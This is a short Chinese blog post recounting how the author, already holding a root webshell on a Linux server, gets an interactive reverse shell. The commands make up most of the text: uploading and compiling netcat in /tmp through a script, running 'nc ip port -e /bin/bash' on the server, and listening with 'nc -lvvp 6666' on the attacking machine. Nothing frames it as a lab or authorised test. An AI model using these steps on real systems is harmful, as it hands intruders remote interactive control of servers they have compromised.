记一次linux反弹shell

Linux 反弹shell,一直都有听说过,可惜自己不会。今天受xz指点,学会了。特记录一下。

root权限,非常好,省得提权了。

由于Linux我们在webshell里面是不好进行交互的,所以我们需要进行反弹shell操作。

首页我们通过webshell上传nc源码到linux服务器上

然后我们进行解压、编译操作

tar -zxvf /tmp/nc/netcat.tar.gz -C /tmp/nc

由于在webshell里面无法切换目录,而编译文件需要在源码目录下进行。
所以我们可以编写一个sh脚本,让它执行编译操作。

/tmp/nc/netcat-0.7.1/./configure --prefix=/tmp/nc/netcat/ && make && make install

最后就是最重要的看点,linux反弹shell

服务端执行如下命令:

nc ip port -e /bin/bash

攻击端进行监听:

nc -lvvp 6666

反弹shell成功



总结

  • 学会请教人,自己不会,但可以请教有经验的人把它学会。
  • 方法很重要